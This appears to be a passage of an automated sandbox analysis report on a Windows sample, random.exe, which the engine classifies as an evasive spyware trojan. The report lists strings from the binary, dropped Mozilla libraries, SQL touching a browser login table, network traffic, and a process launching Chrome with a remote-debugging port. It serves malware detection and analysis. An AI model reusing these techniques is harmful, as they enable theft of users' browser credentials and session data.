              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: chromecache_108.5.drString found in binary or memory: http://www.broofa.com
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: random.exe, random.exe, 00000000.00000002.1890959864.000000006CACD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1890796324.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_106.5.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_106.5.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_108.5.dr, chromecache_106.5.drString found in binary or memory: https://apis.google.com
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_106.5.drString found in binary or memory: https://clients6.google.com
              Source: chromecache_106.5.drString found in binary or memory: https://content.googleapis.com
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chromecache_106.5.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_108.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_108.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_108.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_108.5.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
              Source: chromecache_108.5.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_106.5.drString found in binary or memory: https://plus.google.com
              Source: chromecache_106.5.drString found in binary or memory: https://plus.googleapis.com
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://support.mozilla.org
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
              Source: chromecache_106.5.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: random.exe, 00000000.00000003.1614730027.0000000001372000.00000004.00000020.00020000.00000000.sdmp, FHDAEHDA.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_106.5.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_106.5.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chromecache_108.5.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_108.5.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_108.5.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmp, BGDAAEHDHIIJKECBKEBA.0.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://www.mozilla.org
              Source: random.exe, 00000000.00000002.1871424059.000000000011C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: random.exe, 00000000.00000002.1871424059.000000000011C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: random.exe, 00000000.00000002.1871424059.000000000011C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: random.exe, 00000000.00000003.1808105169.000000000BE74000.00000004.00000020.00020000.00000000.sdmp, BGHIDGCAFCBAAAAAFHDAEHCFIE.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53329
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53329 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

              System Summary

              barindex
              PE file contains section with special chars
              Source: random.exeStatic PE information: section name:
              Source: random.exeStatic PE information: section name: .idata
              Source: random.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CABB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CABB700
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CABB8C0 rand_s,NtQueryVirtualMemory,0_2_6CABB8C0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CABB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CABB910
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CA5F280
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA535A00_2_6CA535A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB34A00_2_6CAB34A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CABC4A00_2_6CABC4A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA66C800_2_6CA66C80
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5D4E00_2_6CA5D4E0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA96CF00_2_6CA96CF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA664C00_2_6CA664C0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA7D4D00_2_6CA7D4D0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC542B0_2_6CAC542B
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CACAC000_2_6CACAC00
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA95C100_2_6CA95C10
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAA2C100_2_6CAA2C10
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA654400_2_6CA65440
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC545C0_2_6CAC545C
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB85F00_2_6CAB85F0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA90DD00_2_6CA90DD0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6FD000_2_6CA6FD00
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA7ED100_2_6CA7ED10
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA805120_2_6CA80512
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB4EA00_2_6CAB4EA0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CABE6800_2_6CABE680
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA75E900_2_6CA75E90
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC76E30_2_6CAC76E3
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5BEF00_2_6CA5BEF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6FEF00_2_6CA6FEF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB9E300_2_6CAB9E30
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAA56000_2_6CAA5600
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA97E100_2_6CA97E10
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC6E630_2_6CAC6E63
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5C6700_2_6CA5C670
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAA2E4E0_2_6CAA2E4E
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA746400_2_6CA74640
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA79E500_2_6CA79E50
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA93E500_2_6CA93E50
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAA77A00_2_6CAA77A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5DFE00_2_6CA5DFE0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA86FF00_2_6CA86FF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA69F000_2_6CA69F00
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA977100_2_6CA97710
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA860A00_2_6CA860A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA7C0E00_2_6CA7C0E0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA958E00_2_6CA958E0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC50C70_2_6CAC50C7
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA9B8200_2_6CA9B820
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAA48200_2_6CAA4820
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA678100_2_6CA67810
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA9F0700_2_6CA9F070
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA788500_2_6CA78850
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA7D8500_2_6CA7D850
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5C9A00_2_6CA5C9A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA8D9B00_2_6CA8D9B0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA951900_2_6CA95190
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB29900_2_6CAB2990
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6D9600_2_6CA6D960
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAAB9700_2_6CAAB970
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CACB1700_2_6CACB170
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA7A9400_2_6CA7A940
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA522A00_2_6CA522A0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA84AA00_2_6CA84AA0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6CAB00_2_6CA6CAB0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC2AB00_2_6CAC2AB0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CACBA900_2_6CACBA90
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA71AF00_2_6CA71AF0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA9E2F00_2_6CA9E2F0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA98AC00_2_6CA98AC0
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA99A600_2_6CA99A60
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA5F3800_2_6CA5F380
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAC53C80_2_6CAC53C8
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA9D3200_2_6CA9D320
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA6C3700_2_6CA6C370
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA553400_2_6CA55340
              Source: C:\Users\user\Desktop\random.exeCode function: String function: 6CA994D0 appears 90 times
              Source: C:\Users\user\Desktop\random.exeCode function: String function: 6CA8CBE8 appears 134 times
              Source: random.exe, 00000000.00000002.1891008643.000000006CAE2000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs random.exe
              Source: random.exe, 00000000.00000002.1891370094.000000006CCD5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs random.exe
              Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: random.exeStatic PE information: Section: buqtyugz ZLIB complexity 0.9949594100484995
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/57@6/7
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CAB7030
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\55OOJQM3.htmJump to behavior
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: random.exe, 00000000.00000003.1613581093.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1742681742.0000000005999000.00000004.00000020.00020000.00000000.sdmp, CFIEHCFIECBGCBFHIJJK.0.dr, KFCGDBAKKKFBGDHJKFHJ.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: random.exe, 00000000.00000002.1890723660.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random.exe, 00000000.00000002.1876220082.0000000005AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: random.exeVirustotal: Detection: 56%
              Source: random.exeReversingLabs: Detection: 60%
              Source: random.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
              Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2128,i,8333296015523379162,13554490080729911822,262144 /prefetch:8
